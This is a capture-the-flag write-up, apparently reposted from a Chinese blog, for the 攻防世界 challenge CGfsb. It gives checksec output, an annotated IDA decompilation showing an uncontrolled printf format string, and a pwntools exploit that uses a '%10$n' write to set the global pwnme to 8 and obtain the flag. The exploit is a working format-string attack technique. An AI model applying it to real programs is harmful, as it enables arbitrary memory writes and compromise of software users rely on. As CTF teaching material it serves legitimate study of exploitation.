『攻防世界』:新手区 | CGfsb

checksec:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

IDA：main 中的 printf(&s) 是一个格式化字符串漏洞，利用它把 pwnme 的值改为 8 即可获取 flag

// IDA decompilation of the challenge binary's main (as printed in the writeup).
// The defect is the uncontrolled format string at printf(&s): `s` is filled
// straight from stdin by fgets, so whoever supplies the message also supplies
// the conversion specifiers (CWE-134). The safe form is printf("%s", &s);
// compilers warn on the original with -Wformat-security. The stack canary
// (v8, "Canary found" in checksec above) does not help here, because the
// %n write goes to a global, not to the stack.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int buf; // [esp+1Eh] [ebp-7Eh]  -- buf, v5, v6 are contiguous: 4+4+2 = 10 bytes, matching read(0, &buf, 0xAu)
  int v5; // [esp+22h] [ebp-7Ah]
  __int16 v6; // [esp+26h] [ebp-76h]
  char s; // [esp+28h] [ebp-74h]  -- 100 bytes up to the canary at ebp-10h (0x74 - 0x10 = 0x64)
  unsigned int v8; // [esp+8Ch] [ebp-10h]  -- stack canary slot

  v8 = __readgsdword(0x14u); // load the stack canary
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  buf = 0;
  v5 = 0;
  v6 = 0;
  memset(&s, 0, 0x64u); // zero all 100 bytes of s
  puts("please tell me your name:");
  read(0, &buf, 0xAu); // up to 10 bytes; read() adds no terminator, so a full 10-byte name runs on into s for the %s below
  puts("leave your message please:");
  fgets(&s, 100, stdin); // at most 99 chars + NUL: no overflow of s itself
  printf("hello %s", &buf);
  puts("your message is:");
  printf(&s); // VULN: format string comes from the user; should be printf("%s", &s)
  // pwnme is not declared in main -- presumably a global in the writable data
  // segment (the writeup gives 0x0804A068; the binary is non-PIE, so the
  // address is fixed). The only path to the flag is changing it to 8.
  if ( pwnme == 8 )
  {
    // NOTE(review): the literal below is split across two lines by the page
    // extraction; it presumably ends in "\n" in the original decompilation.
    puts("you pwned me, here is your flag:
");
    system("cat flag");
  }
  else
  {
    puts("Thank you!");
  }
  return 0;
}

exp:

from pwn import *

# Exploit script as given in the writeup (pwntools). The message sent to the
# vulnerable printf(&s) starts with the 4-byte address of pwnme followed by
# four filler characters, so 8 characters have been printed when "%10$n" is
# reached; %n then stores that count (8) through the pointer found at
# argument slot 10, which for this binary is where the leading address lands
# (offset 10 is the writeup's value for this challenge). main then sees
# pwnme == 8 and prints the flag.
# NOTE(review): p32() returns bytes while 'aaaa' and '%10$n' are str
# literals, so this is written for Python 2 pwntools.
io = remote('',)  # host and port left blank by the author
payload = p32(0x0804A068) + 'aaaa' + '%10$n'  # 0x0804A068 is the address of pwnme (non-PIE binary, so it is fixed)
io.sendlineafter('name:','aaa')  # the name goes through read(0, &buf, 10); 'aaa' + newline fits
io.sendlineafter('please:',payload)  # the message is what printf(&s) uses as its format string
io.interactive()

注:

%n：把 printf 在该 %n 之前已经输出的字符个数，写入到对应参数位置（偏移处）的指针所指向的地址

原文地址:https://www.cnblogs.com/Zowie/p/13432765.html